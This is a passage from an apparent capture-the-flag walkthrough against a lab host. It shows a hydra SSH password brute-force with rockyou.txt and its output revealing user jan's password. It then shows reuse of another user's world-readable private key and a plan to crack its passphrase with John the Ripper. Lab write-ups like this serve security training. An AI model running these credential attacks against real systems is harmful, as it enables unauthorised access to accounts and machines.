As we known the username we can try to bruteforce the password over ssh with [hydra]:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$ hydra -l jan -P /usr/share/wordlists/passwords/rockyou.txt ssh://10.10.126.77 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-03 00:38:09 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ssh://10.10.126.77:22/ [STATUS] 180.00 tries/min, 180 tries in 00:01h, 14344222 to do in 1328:11h, 16 active [STATUS] 133.00 tries/min, 399 tries in 00:03h, 14344003 to do in 1797:30h, 16 active [22][ssh] host: 10.10.126.77 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 6 final worker threads did not complete until end. [ERROR] 6 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-03 00:44:54
Kay SSH private key is readable by everyone so we can save it on our machine
and change the permission so openssh won't complain:
1
$ chmod 600 kay.key
Then we can try to authenticate over SSH with this key:
1 2
$ ssh kay@10.10.126.77 -i kay.key Enter passphrase for key 'kay.key':
But for now we are blocked as the private key is encrypted and need a password
to be unlocked.
We can try to crack the private key password with John The Ripper.
First we have to convert the key in a format readable by john.
Then we can try to bruteforce the password.